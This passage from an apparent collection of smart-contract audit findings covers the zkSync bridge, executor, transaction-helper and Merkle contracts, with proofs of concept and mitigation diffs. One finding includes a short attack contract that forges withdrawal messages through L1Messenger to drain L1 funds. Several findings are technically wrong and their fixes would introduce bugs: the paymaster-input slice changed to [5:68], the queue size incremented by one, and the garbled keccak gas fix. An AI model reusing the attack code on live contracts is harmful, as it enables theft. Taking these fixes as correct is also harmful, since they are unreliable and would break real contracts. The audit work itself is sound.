The code above in the L1SharedBridge contract shows how depositLegacyErc20Bridge(...) function is implemented, the point of interest is how depositHappened[ERA_CHAIN_ID][l2TxHash] is assigned the value of txDataHash , The problem is that if previous Transaction Data Hash has not been claimed yet at L340 and depositLegacyErc20Bridge(...) function is called with a new Transaction Data Hash value it would override it without reversion thereby causing loss of fund

Tools Used

Manual Review

Recommended Mitigation Steps

A similar implementation to L237 to ensure Unclaimed Failed Deposit is empty before resetting it, the adjustment would look like this

 function depositLegacyErc20Bridge(
        address _prevMsgSender,
        address _l2Receiver,
        address _l1Token,
        uint256 _amount,
        uint256 _l2TxGasLimit,
        uint256 _l2TxGasPerPubdataByte,
        address _refundRecipient
    ) external payable override onlyLegacyBridge nonReentrant returns (bytes32 l2TxHash) {
        require(l2BridgeAddress[ERA_CHAIN_ID] != address(0), "ShB b. n dep");
        require(_l1Token != l1WethAddress, "ShB: WETH deposit not supported 2");

        // Note that funds have been transferred to this contract in the legacy ERC20 bridge.
        if (!hyperbridgingEnabled[ERA_CHAIN_ID]) {
            chainBalance[ERA_CHAIN_ID][_l1Token] += _amount;
        }

        bytes memory l2TxCalldata = _getDepositL2Calldata(_prevMsgSender, _l2Receiver, _l1Token, _amount);

        {
            ...
        }

        bytes32 txDataHash = keccak256(abi.encode(_prevMsgSender, _l1Token, _amount));
        // Save the deposited amount to claim funds on L1 if the deposit failed on L2
+++     require(depositHappened[ERA_CHAIN_ID][l2TxHash] == 0x00, "ShB tx hap");
        depositHappened[ERA_CHAIN_ID][l2TxHash] = txDataHash;

        emit LegacyDepositInitiated(ERA_CHAIN_ID, l2TxHash, _prevMsgSender, _l2Receiver, _l1Token, _amount);
    }

Assessed type

Context

`Executor.sol` don't respect the EIP-4844

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Executor.sol#L605-L619

Vulnerability details

Impact

Function Executor.sol#_pointEvaluationPrecompile() does not work as expected due to missing constraint checking for the returned result.

Proof of Concept

  • According to EIP-4844, we can see that the returned result is 64 bytes, which is the sum of the first 32 bytes are Bytes(U256(FIELD_ELEMENTS_PER_BLOB).to_be_bytes32() and the last 32 bytes are U256(BLS_MODULUS).to_be_bytes32().
def point_evaluation_precompile(input: Bytes) -> Bytes:
----SNIP----
    # Return FIELD_ELEMENTS_PER_BLOB and BLS_MODULUS as padded 32 byte big endian values
    return Bytes(U256(FIELD_ELEMENTS_PER_BLOB).to_be_bytes32() + U256(BLS_MODULUS).to_be_bytes32())
  • Take a look at Executor.sol#_pointEvaluationPrecompile() : here
File: Executor.sol
601    /// @notice Calls the point evaluation precompile and verifies the output
602    /// Verify p(z) = y given commitment that corresponds to the polynomial p(x) and a KZG proof.
603    /// Also verify that the provided commitment matches the provided versioned_hash.
604    ///
605    function _pointEvaluationPrecompile(
606        bytes32 _versionedHash,
607        bytes32 _openingPoint,
608        bytes calldata _openingValueCommitmentProof
609    ) internal view {
610        bytes memory precompileInput = abi.encodePacked(_versionedHash, _openingPoint, _openingValueCommitmentProof);
611
612        (bool success, bytes memory data) = POINT_EVALUATION_PRECOMPILE_ADDR.staticcall(precompileInput);
613
614        // We verify that the point evaluation precompile call was successful by testing the latter 32 bytes of the
615        // response is equal to BLS_MODULUS as defined in https://eips.ethereum.org/EIPS/eip-4844#point-evaluation-precompile
616        require(success, "failed to call point evaluation precompile");
617        (, uint256 result) = abi.decode(data, (uint256, uint256));
618        require(result == BLS_MODULUS, "precompile unexpected output");
619    }
  • On L612, after the data value is calculated there is no checking for the length of data = 64 .
  • On L618, the value of result is only checked with BLS_MODULUS instead of being checked with FIELD_ELEMENTS_PER_BLOB and BLS_MODULUS .
  • This can lead to unexpected precompilation results .

Tools Used

Manual review and https://eips.ethereum.org/EIPS/eip-4844#point-evaluation-precompile

Recommended Mitigation Steps

Consider change to :

File: Executor.sol
    function _pointEvaluationPrecompile(
        bytes32 _versionedHash,
        bytes32 _openingPoint,
        bytes calldata _openingValueCommitmentProof
    ) internal view {
        bytes memory precompileInput = abi.encodePacked(_versionedHash, _openingPoint, _openingValueCommitmentProof);


        (bool success, bytes memory data) = POINT_EVALUATION_PRECOMPILE_ADDR.staticcall(precompileInput);


        // We verify that the point evaluation precompile call was successful by testing the latter 32 bytes of the
        // response is equal to BLS_MODULUS as defined in https://eips.ethereum.org/EIPS/eip-4844#point-evaluation-precompile
        require(success, "failed to call point evaluation precompile");
+++        if (data.length != 64) revert INVALID_DATA ;
---        (, uint256 result) = abi.decode(data, (uint256, uint256));
---        require(result == BLS_MODULUS, "precompile unexpected output");
+++        bytes32 first;
+++        bytes32 second;
+++        assembly {
+++            first := mload(add(data, 32))
+++            second := mload(add(data, 64))
+++        }
+++        if (uint256(first) != FIELD_ELEMENTS_PER_BLOB || uint256(second) != BLS_MODULUS) {
+++            revert UNEXPECTED_OUTPUT();
        }
    }

Assessed type

Other

L2SharedBridge.finalizeDeposit will not work for legacy bridge

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/zksync/contracts/bridge/L2SharedBridge.sol#L87-L91

Vulnerability details

Proof of Concept

L2SharedBridge.finalizeDeposit function is allowed to be called by l1 shared bridge or legacy bridge.

The problem is that legacy bridge is not stored during initialization and thus finalization will not work.

Impact

Finalization of legacy deposit will not work.

Tools Used

VsCode

Recommended Mitigation Steps

Save l1LegacyBridge variable.

Assessed type

Error

`TransactionHelper.sol` violates EIP-712

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L84-L87
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L25-L71
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L118-L136

Vulnerability details

Impact

According to EIP-712 spec, the typehash should contain all the fields defined in the struct.
The current implementation of EIP712_TRANSACTION_TYPE_HASH, however, misses the signature field.

Proof of Concept

File: TransactionHelper.sol

bytes32 constant EIP712_TRANSACTION_TYPE_HASH =
        keccak256(
            "Transaction(uint256 txType,uint256 from,uint256 to,uint256 gasLimit,uint256 gasPerPubdataByteLimit,uint256 maxFeePerGas,uint256 maxPriorityFeePerGas,uint256 paymaster,uint256 nonce,uint256 value,bytes data,bytes32[] factoryDeps,bytes paymasterInput)"
        );

EIP712_TRANSACTION_TYPE_HASH is defined as above.

File: TransactionHelper.sol

struct Transaction {
    // The type of the transaction.
    uint256 txType;
    // The caller.
    uint256 from;
    // The callee.
    uint256 to;
    // The gasLimit to pass with the transaction.
    // It has the same meaning as Ethereum's gasLimit.
    uint256 gasLimit;
    // The maximum amount of gas the user is willing to pay for a byte of pubdata.
    uint256 gasPerPubdataByteLimit;
    // The maximum fee per gas that the user is willing to pay.
    // It is akin to EIP1559's maxFeePerGas.
    uint256 maxFeePerGas;
    // The maximum priority fee per gas that the user is willing to pay.
    // It is akin to EIP1559's maxPriorityFeePerGas.
    uint256 maxPriorityFeePerGas;
    // The transaction's paymaster. If there is no paymaster, it is equal to 0.
    uint256 paymaster;
    // The nonce of the transaction.
    uint256 nonce;
    // The value to pass with the transaction.
    uint256 value;
    // In the future, we might want to add some
    // new fields to the struct. The `txData` struct
    // is to be passed to account and any changes to its structure
    // would mean a breaking change to these accounts. In order to prevent this,
    // we should keep some fields as "reserved".
    // It is also recommended that their length is fixed, since
    // it would allow easier proof integration (in case we will need
    // some special circuit for preprocessing transactions).
    uint256[4] reserved;
    // The transaction's calldata.
    bytes data;
    // The signature of the transaction.
    bytes signature;
    // The properly formatted hashes of bytecodes that must be published on L1
    // with the inclusion of this transaction. Note, that a bytecode has been published
    // before, the user won't pay fees for its republishing.
    bytes32[] factoryDeps;
    // The input to the paymaster.
    bytes paymasterInput;
    // Reserved dynamic type for the future use-case. Using it should be avoided,
    // But it is still here, just in case we want to enable some additional functionality.
    bytes reservedDynamic;
}

While struct Transaction is defined as above.

We can clearly see, that signature field defined in Transaction struct is not defined in the EIP712_TRANSACTION_TYPE_HASH.

Moreover, when we'll examine _encodeHashEIP712Transaction() function - the signature is also missing there.

File: TransactionHelper.sol

function _encodeHashEIP712Transaction(Transaction calldata _transaction) private view returns (bytes32) {
        bytes32 structHash = keccak256(
            abi.encode(
                EIP712_TRANSACTION_TYPE_HASH,
                _transaction.txType,
                _transaction.from,
                _transaction.to,
                _transaction.gasLimit,
                _transaction.gasPerPubdataByteLimit,
                _transaction.maxFeePerGas,
                _transaction.maxPriorityFeePerGas,
                _transaction.paymaster,
                _transaction.nonce,
                _transaction.value,
                EfficientCall.keccak(_transaction.data),
                keccak256(abi.encodePacked(_transaction.factoryDeps)),
                EfficientCall.keccak(_transaction.paymasterInput)
            )
        );

Tools Used

Manual code review

Recommended Mitigation Steps

Add missing signature field.

Assessed type

Other

It's possible to replay some upgrade transactions

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/libraries/TransactionValidator.sol#L55
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/libraries/TransactionHelper.sol#L118-L136

Vulnerability details

Impact

Field reserved is not being taken into consideration when encoding hash of the zkSync native transaction type (TransactionHelper._encodeHashEIP712Transaction()).

Moreover, according to TransactionValidator.validateUpgradeTransaction(), upgrade transaction is valid when reserved[1] <= type(uint160).max. This means that it's possible to replay upgrade transaction by providing different values to reserved[1] field.

Proof of Concept

File: TransactionValidator.sol

        require(_transaction.reserved[0] == 0, "ue");
        require(_transaction.reserved[1] <= type(uint160).max, "uf");
        require(_transaction.reserved[2] == 0, "ug");
        require(_transaction.reserved[3] == 0, "uo");

While reserved[0], reserved[2], reserved[3] must equal to 0 - the reserved[1] just needs to be lower or equal type(uint160).max.

File: TransactionHelper.sol

function _encodeHashEIP712Transaction(Transaction calldata _transaction) private view returns (bytes32) {
        bytes32 structHash = keccak256(
            abi.encode(
                EIP712_TRANSACTION_TYPE_HASH,
                _transaction.txType,
                _transaction.from,
                _transaction.to,
                _transaction.gasLimit,
                _transaction.gasPerPubdataByteLimit,
                _transaction.maxFeePerGas,
                _transaction.maxPriorityFeePerGas,
                _transaction.paymaster,
                _transaction.nonce,
                _transaction.value,
                EfficientCall.keccak(_transaction.data),
                keccak256(abi.encodePacked(_transaction.factoryDeps)),
                EfficientCall.keccak(_transaction.paymasterInput)
            )
        );

Since reserved field is not being taken into consideration in _encodeHashEIP712Transaction(), this basically means, that it would be possible to replay some transactions with different _transaction.reserved[1].

  1. Let's create a valid upgrade transaction and send it. Let's assume that its reserved is set to "0100"
  2. Let's take that transaction and modify reserved[1]: now reserve is "0200".
  3. Since require(_transaction.reserved[1] <= type(uint160).max, "uf"); is valid (line 55 in TransactionValidator.sol) - the whole upgrade transaction is still valid and it's possible to replay it.

Tools Used

Manual code review

Recommended Mitigation Steps

reserved fields should have constant values, until they are not taken into consideration in TransactionHelper._encodeHashEIP712Transaction().
This means, that line 55 in TransactionValidator.sol should be changed from: require(_transaction.reserved[1] <= type(uint160).max, "uf"); to require(_transaction.reserved[1] == 0, "uf");.

Assessed type

Other

`depositAmount` is not properly updated in `L1ERC20Bridge.deposit()`

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1ERC20Bridge.sol#L154

Vulnerability details

Impact

Function L1ERC20Bridge.deposit() initiates a deposit by locking funds on the contract and sending the request of processing an L2 transaction where tokens would be minted.
The amount of deposit is being assigned to depositAmount[msg.sender][_l1Token][l2TxHash] mapping.
However, calling deposit() does not increase depositAmount[msg.sender][_l1Token][l2TxHash], but overwrites the old value of depositAmount[msg.sender][_l1Token][l2TxHash].
This implies, that when user calls deposit() more than once - he will suffer for the fund loss, because the old value of depositAmount[msg.sender][_l1Token][l2TxHash] will be overwritten by the new value.

Proof of Concept

File: L1ERC20Bridge.sol

depositAmount[msg.sender][_l1Token][l2TxHash] = _amount;

As demonstrated above, depositAmount[msg.sender][_l1Token][l2TxHash] is not increased by _amount, but it is simply overwritten.

  1. User calls deposit() with _amount set to 100.
  2. User calls deposit() again, with _amount set to 50.
  3. depositAmount[msg.sender][_l1Token][l2TxHash] should point to 150 (100 from the first call + 50 from the second call).
  4. However, because of the = operator, depositAmount[msg.sender][_l1Token][l2TxHash] actually points to 50 (call from the 2. stage overwrote the _amount set during the 1. stage).
  5. User suffers for loss, because the mapping depositAmount[msg.sender][_l1Token][l2TxHash] points that his deposit is only 50, while he deposited 150.

Tools Used

Manual code review

Recommended Mitigation Steps

Change:

depositAmount[msg.sender][_l1Token][l2TxHash] = _amount;

to:

depositAmount[msg.sender][_l1Token][l2TxHash] += _amount;

Assessed type

Context

Incorrect calculation of `keccakGasCost`

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/L1Messenger.sol#L50-L51

Vulnerability details

Impact

The keccakGasCost is not correctly calculated. The keccakGasCost will be greater then expected.
This issue is related to user's fund loss - because user - in same scenarios - will pay more gas than expected.

Proof of Concept

File: L1Messenger.sol

    function keccakGasCost(uint256 _length) internal pure returns (uint256) {
        return KECCAK_ROUND_GAS_COST * (_length / KECCAK_ROUND_NUMBER_OF_BYTES + 1);
    }
  • Let's consider a scenario where _length == KECCAK_ROUND_NUMBER_OF_BYTES.

keccakGasCost(KECCAK_ROUND_NUMBER_OF_BYTES) = KECCAK_ROUND_GAS_COST * (KECCAK_ROUND_NUMBER_OF_BYTES / KECCAK_ROUND_NUMBER_OF_BYTES + 1) = KECCAK_ROUND_GAS_COST * 2.
When the _length is KECCAK_ROUND_NUMBER_OF_BYTES, the cost of keccak should actually be KECCAK_ROUND_GAS_COST, however it's twice as big as it should be.

In other words, when _length is in a form of N * KECCAK_ROUND_GAS_COST (_length is divisible by KECCAK_ROUND_GAS_COST), the keccak cost has one additional KECCAK_ROUND_GAS_COST.

For keccakGasCost(N * KECCAK_ROUND_NUMBER_OF_BYTES) the cost should be exactly: N * KECCAK_ROUND_NUMBER_OF_BYTES, however function keccakGasCost() returns:
keccakGasCost(N * KECCAK_ROUND_NUMBER_OF_BYTES) = KECCAK_ROUND_GAS_COST * (N * KECCAK_ROUND_NUMBER_OF_BYTES / KECCAK_ROUND_NUMBER_OF_BYTES + 1) = KECCAK_ROUND_GAS_COST * ( N + 1) = N * KECCAK_ROUND_GAS_COST + KECCAK_ROUND_GAS_COST. As we see, there's additional KECCAK_ROUND_GAS_COST.

Tools Used

Manual code review

Recommended Mitigation Steps

When _length == N * KECCAK_ROUND_NUMBER_OF_BYTES, function keccakGasCost() should return N * KECCAK_ROUND_NUMBER_OF_BYTES instead of N * KECCAK_ROUND_NUMBER_OF_BYTES + KECCAK_ROUND_NUMBER_OF_BYTES

Assessed type

Math

QA Report

See the markdown file with the details of this report here.

Initialize function can be called by any external address

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L79
https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L104

Vulnerability details

Impact

No form of access control will lead to the call of the initialize function by any external address

Proof of Concept

Consider the initialize function:
function initialize(StateTransitionManagerInitializeData calldata _initializeData) external reentrancyGuardInitializer {
require(_initializeData.governor != address(0), "StateTransition: governor zero");
_transferOwnership(_initializeData.governor);

// Initialization logic...

}

The absence of an explicit access control modifier is a serious security issue as it can permit an attacker to reinitialize the contract or tamper with its state

Tools Used

Manual Review

Recommended Mitigation Steps

The OnlyOwner modifier or an appropriate access control mechanism (say a msg.sender require statement) should be included in the function

Assessed type

Access Control

Wrong Execution Due to Pay Master Input Overlap in TransactionHelper Contract

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/system-contracts/contracts/libraries/TransactionHelper.sol#L374

Vulnerability details

Impact

Wrong Execution Due to Pay Master Input Overlap in TransactionHelper Contract

Proof of Concept

 function processPaymasterInput(Transaction calldata _transaction) internal {
        require(_transaction.paymasterInput.length >= 4, "The standard paymaster input must be at least 4 bytes long");

>>>        bytes4 paymasterInputSelector = bytes4(_transaction.paymasterInput[0:4]);
        if (paymasterInputSelector == IPaymasterFlow.approvalBased.selector) {
            require(
                _transaction.paymasterInput.length >= 68,
                "The approvalBased paymaster input must be at least 68 bytes long"
            );

            // While the actual data consists of address, uint256 and bytes data,
            // the data is needed only for the paymaster, so we ignore it here for the sake of optimization
>>>            (address token, uint256 minAllowance) = abi.decode(_transaction.paymasterInput[4:68], (address, uint256));
            address paymaster = address(uint160(_transaction.paymaster));

            uint256 currentAllowance = IERC20(token).allowance(address(this), paymaster);
            if (currentAllowance < minAllowance) {
                // Some tokens, e.g. USDT require that the allowance is firsty set to zero
                // and only then updated to the new value.

                IERC20(token).safeApprove(paymaster, 0);
                IERC20(token).safeApprove(paymaster, minAllowance);
            }
        } else if (paymasterInputSelector == IPaymasterFlow.general.selector) {
            // Do nothing. general(bytes) paymaster flow means that the paymaster must interpret these bytes on his own.
        } else {
            revert("Unsupported paymaster flow");
        }
    }

The code above shows how processPaymasterInput(...) is implemented in the TransactionHelper contract, a look at the first pointer from the code above shows that bytes4(_transaction.paymasterInput[0:4] was used to derive paymasterInputSelector, the problem is that later in the code in the second point instead of using _transaction.paymasterInput[5:68] to derive token and minAllowance, the protocol used _transaction.paymasterInput[4:68], i.e [4:68] instead of [5:68], since the data for paymasterInputSelector is between 0 to 4, the value for token and minAllowance should start from 5 not 4.

Tools Used

Manual Review

Recommended Mitigation Steps

Protocol should make necessary adjustments to prevent input value overlap which could end up breaking protocol. The adjustment should be made as provided below

 function processPaymasterInput(Transaction calldata _transaction) internal {
        require(_transaction.paymasterInput.length >= 4, "The standard paymaster input must be at least 4 bytes long");

        bytes4 paymasterInputSelector = bytes4(_transaction.paymasterInput[0:4]);
        if (paymasterInputSelector == IPaymasterFlow.approvalBased.selector) {
            require(
                _transaction.paymasterInput.length >= 68,
                "The approvalBased paymaster input must be at least 68 bytes long"
            );

            // While the actual data consists of address, uint256 and bytes data,
            // the data is needed only for the paymaster, so we ignore it here for the sake of optimization
---            (address token, uint256 minAllowance) = abi.decode(_transaction.paymasterInput[4:68], (address, uint256));
+++            (address token, uint256 minAllowance) = abi.decode(_transaction.paymasterInput[5:68], (address, uint256));
            address paymaster = address(uint160(_transaction.paymaster));

            uint256 currentAllowance = IERC20(token).allowance(address(this), paymaster);
            if (currentAllowance < minAllowance) {
                // Some tokens, e.g. USDT require that the allowance is firsty set to zero
                // and only then updated to the new value.

                IERC20(token).safeApprove(paymaster, 0);
                IERC20(token).safeApprove(paymaster, minAllowance);
            }
        } else if (paymasterInputSelector == IPaymasterFlow.general.selector) {
            // Do nothing. general(bytes) paymaster flow means that the paymaster must interpret these bytes on his own.
        } else {
            revert("Unsupported paymaster flow");
        }
    }

Assessed type

Context

QA Report

See the markdown file with the details of this report here.

Incorrect `_setVerifierParams()` implementation

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/upgrades/BaseZkSyncUpgrade.sol#L147-L157

Vulnerability details

Impact

To properly upgrade VerifierParams, none of the parameters: recursionNodeLevelVkHash, recursionLeafLevelVkHash, recursionCircuitsSetVksHash can be empty (bytes32(0)).
However, the current implementation of _setVerifierParams() does not enforce this requirement. If at least one of these parameters is non-zero - _setVerifierParams() will upgrade VerifierParams.

This basically means, that it's possible to upgrade VerifierParams even when some of the parameters are bytes32(0). This should not be possible. The VerifierParams should be upgraded only when all provided parameters are non-empty.

This behavior is even confirmed in the previous version of the zkSync code:

File: previous contest

    function _setVerifierParams(VerifierParams calldata _newVerifierParams) private {
        if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

During the previous contest, function _setVerifierParams() was using || operator, while the current implementation of _setVerifierParams() is using && operator.

Proof of Concept

File: BaseZkSyncUpgrade.sol

        if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

        VerifierParams memory oldVerifierParams = s.verifierParams;
        s.verifierParams = _newVerifierParams;
        emit NewVerifierParams(oldVerifierParams, _newVerifierParams);

As demonstrated above, function uses AND operator (&&) instead of OR (||). This basically means, that if at least one parameter is not bytes32(0) - then above condition won't be fulfilled and function will continue its execution and set VerifierParams.

E.g., let's consider a scenario, where:

_newVerifierParams.recursionNodeLevelVkHash == bytes32(0)
_newVerifierParams.recursionLeafLevelVkHash == bytes32(0)
_newVerifierParams.recursionCircuitsSetVksHash == bytes32(11)

Even though above params are not correct (recursionNodeLevelVkHash and recursionLeafLevelVkHash are bytes32(0)), function won't return at lines 147-153, because recursionCircuitsSetVksHash is not bytes32(0) and it will update VerifierParams.

This leads to the conclusion, that _setVerifierParams() will upgrade VerifierParams, even when some of them are empty.

Tools Used

Manual code review

Recommended Mitigation Steps

Use OR instead of AND. It should not be possible to upgrade VerifierParams when any of the parameter is bytes32(0):

The code should be changed to:

        if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

Assessed type

Invalid Validation

An attacker can drain funds on L1 from L2

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/L1Messenger.sol#L116

Vulnerability details

Impact

an attacker can drain fund without burn a token on L2

Proof of Concept

The L1Messenger.sendToL1 function always called when user to "withdraw" fund from L2 to L1, L1Messenger.sendToL1 function is message to signal of bridge

## L2BaseToken

 function withdraw(address _l1Receiver) external payable override {
        uint256 amount = _burnMsgValue();

        // Send the L2 log, a user could use it as proof of the withdrawal
        bytes memory message = _getL1WithdrawMessage(_l1Receiver, amount);
        L1_MESSENGER_CONTRACT.sendToL1(message);

        emit Withdrawal(msg.sender, _l1Receiver, amount);
    }

Unfortunately when we look at the L1Messenger.sendToL1 function, it has no access control. So, anyone can call L1Messenger.sendToL1 function and send malicious messages to L1.

POC

pragma solidity 0.8.20;

import {Test} from "forge-std/Test.sol";
import {L1Messenger} from "./L1Messenger.sol";

contract Attack is Test {

    L1Messenger public L1_MESSENGER_CONTRACT;

    constructor(address l1messager){
        L1_MESSENGER_CONTRACT = L1Messenger(l1messager);
    }

    function attack(uint256 amount) public {
     bytes memory message = _getL1WithdrawMessageMalicous(msg.sender, amount);
     L1_MESSENGER_CONTRACT.sendToL1(message);

    }

 function _getL1WithdrawMessageMalicous(address _to, uint256 _amount) internal pure returns (bytes memory) {
        return abi.encodePacked(IMailbox.finalizeEthWithdrawal.selector, _to, _amount);
    }
}

Tools Used

Manual

Recommended Mitigation Steps

add access control e.g. only bridge or only systemContract

Assessed type

Access Control

Wrong Code Implementation or Comment Description

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/PriorityQueue.sol#L34
https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/PriorityQueue.sol#L46

Vulnerability details

Impact

The wrong total number of unprocessed priority operations would be returned when Size is requested in priority queue

Proof of Concept

 /// @notice Returns zero if and only if no operations were processed from the queue
>>>    /// @return Index of the oldest priority operation that wasn't processed yet
    function getFirstUnprocessedPriorityTx(Queue storage _queue) internal view returns (uint256) {
        return _queue.head;
    }

The comment description from the pointer above shows that the function returns the oldest priority operation that wasn't processed yet meaning _queue.head is also one of the operation that hasn't been processed yet.
The code below shows how Size is gotten to show the number of unprocessed priority operations The problem is in the code which shows that _queue.head is not put into consideration, only the value after _queue.head to _queue.tail

  /// @return The total number of unprocessed priority operations in a priority queue
    function getSize(Queue storage _queue) internal view returns (uint256) {
>>>        return uint256(_queue.tail - _queue.head);
    }

Tools Used

Manual Review
Protocol should put the _queue.head into consideration in the size count by adding 1 after the subtraction, if this is intended then the comment description before getFirstUnprocessedPriorityTx(...) function should be corrected appropriately

Recommended Mitigation Steps

  /// @return The total number of unprocessed priority operations in a priority queue
    function getSize(Queue storage _queue) internal view returns (uint256) {
---        return uint256(_queue.tail - _queue.head);
+++        return uint256(_queue.tail - _queue.head + 1);
    }

Assessed type

Access Control

StateTransitionManager doesn't have ability to set some settings for chain

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L45-L64

Vulnerability details

Proof of Concept

There are several settings that can be set by StateTransitionManager in the admin facet for the chain. All those function use onlyStateTransitionManager modifier.

But StateTransitionManager itself doesn't have any means to call that functions and thus changed the configuration. While all settings are set during initial upgrade of proxy, StateTransitionManager can't change those values for existing chains and invariant is broken.

Impact

StateTransitionManager can't change some settings for the chain.

Tools Used

VsCode

Recommended Mitigation Steps

Implement those functions.

Assessed type

Error

Unable to Get Correct Recipient Address

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridgehub/Bridgehub.sol#L325-L335

Vulnerability details

Impact

In the Bridgehub contract, the _actualRefundRecipient function is responsible for obtaining the correct _recipient address. Specifically, if the _refundRecipient address on L1 is a contract, it needs to be converted to an L2 alias. However, the function does not consider the case where _refundRecipient is set to the calling contract (msg.sender).

This is called in the contract constructor and sets _refundRecipient to the contract address itself. In this way, _refundRecipient is a contract, but _refundRecipient.code.length is 0, which will cause the contract address on L1 to not be converted to an L2 alias.

Proof of Concept

// SPDX-License-Identifier: GPL-3.0
pragma solidity 0.8.20;
import "forge-std/console.sol";

interface IContractB {
    function actualRefundRecipient(address _refundRecipient) external  view returns (address _recipient);
}

contract A {
    constructor(address b) {

        testActualRefundRecipient(b);
    }

    function testActualRefundRecipient(address b) public view returns (address _recipient) {
        console.log("address this: ", address(this));
        _recipient = IContractB(b).actualRefundRecipient(address(this));
        console.log("address recipient: ", _recipient);
    }
}

Tools Used

Remix

Recommended Mitigation Steps

In the _actualRefundRecipient function, we need to consider the situation where _refundRecipient is msg.sender but not equal to tx.origin.

Assessed type

Other

When a batch, initially committed with system contract upgrades, is rolled back using the revertBatches() function to stop its execution, any subsequent batches that were meant to be committed without system contract upgrades will instead be committed as if they had system contract upgrades

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Executor.sol#L481-L493

Vulnerability details

Impact

impact at code-423n4/2023-10-zksync-findings#527 report

Proof of Concept

Proof at code-423n4/2023-10-zksync-findings#527 report

Tools Used

Manual Review

Recommended Mitigation Steps

Protocol should consider deleting s.l2SystemContractsUpgradeTxHash along side batch number under every circumstance that s.l2SystemContractsUpgradeBatchNumber is deleted

Assessed type

Context

Denial of Service when PathLength of Merkle Root is Within a Valid Value

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/Merkle.sol#L25

Vulnerability details

Impact

Denial of Service when Path Length of Merkle Root is exactly 256 which should be a valid length value but would revert due to wrong implementation in Merkle Root Calculation

Proof of Concept

 function calculateRoot(
        bytes32[] calldata _path,
        uint256 _index,
        bytes32 _itemHash
    ) internal pure returns (bytes32) {
        uint256 pathLength = _path.length;
        require(pathLength > 0, "xc");
>>>        require(pathLength < 256, "bt");
        require(_index < (1 << pathLength), "px");

        bytes32 currentHash = _itemHash;
        for (uint256 i; i < pathLength; i = i.uncheckedInc()) {
            currentHash = (_index % 2 == 0)
                ? _efficientHash(currentHash, _path[i])
                : _efficientHash(_path[i], currentHash);
            _index /= 2;
        }

        return currentHash;
    }

The code above shows how Merkle Root is calculated in the Merkle contract, however the code reverts when Path length is 256, 256 is still within the allowed size, reverting it would cause Denial of Service in the Merkle Contract

Tools Used

Manual Review

Recommended Mitigation Steps

As corrected below path length of 256 should also be allowed without reversion

 function calculateRoot(
        bytes32[] calldata _path,
        uint256 _index,
        bytes32 _itemHash
    ) internal pure returns (bytes32) {
        uint256 pathLength = _path.length;
        require(pathLength > 0, "xc");
---        require(pathLength < 256, "bt");
+++        require(pathLength <= 256, "bt");
        require(_index < (1 << pathLength), "px");

        bytes32 currentHash = _itemHash;
        for (uint256 i; i < pathLength; i = i.uncheckedInc()) {
            currentHash = (_index % 2 == 0)
                ? _efficientHash(currentHash, _path[i])
                : _efficientHash(_path[i], currentHash);
            _index /= 2;
        }

        return currentHash;
    }

Assessed type

DoS

Security Vulnerabilities and Access Control Issues in L1ERC20Bridge Smart Contract

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridge/L1ERC20Bridge.sol/README.md?plain=1#L63

Vulnerability details

Impact

Detailed description of the impact of this finding.

Access Control and Permissions:

Error: The tranferTokenToSharedBridge function lacks proper access control, allowing any caller to transfer tokens to the shared bridge.

Solution: Implement access control checks to restrict the tranferTokenToSharedBridge function to specific roles or contracts. You can use access control modifiers or require statements to ensure that only authorized users can call this function. For example:

function tranferTokenToSharedBridge(address _token, uint256 _amount) external {
require(msg.sender == address(sharedBridge), "Not authorized");
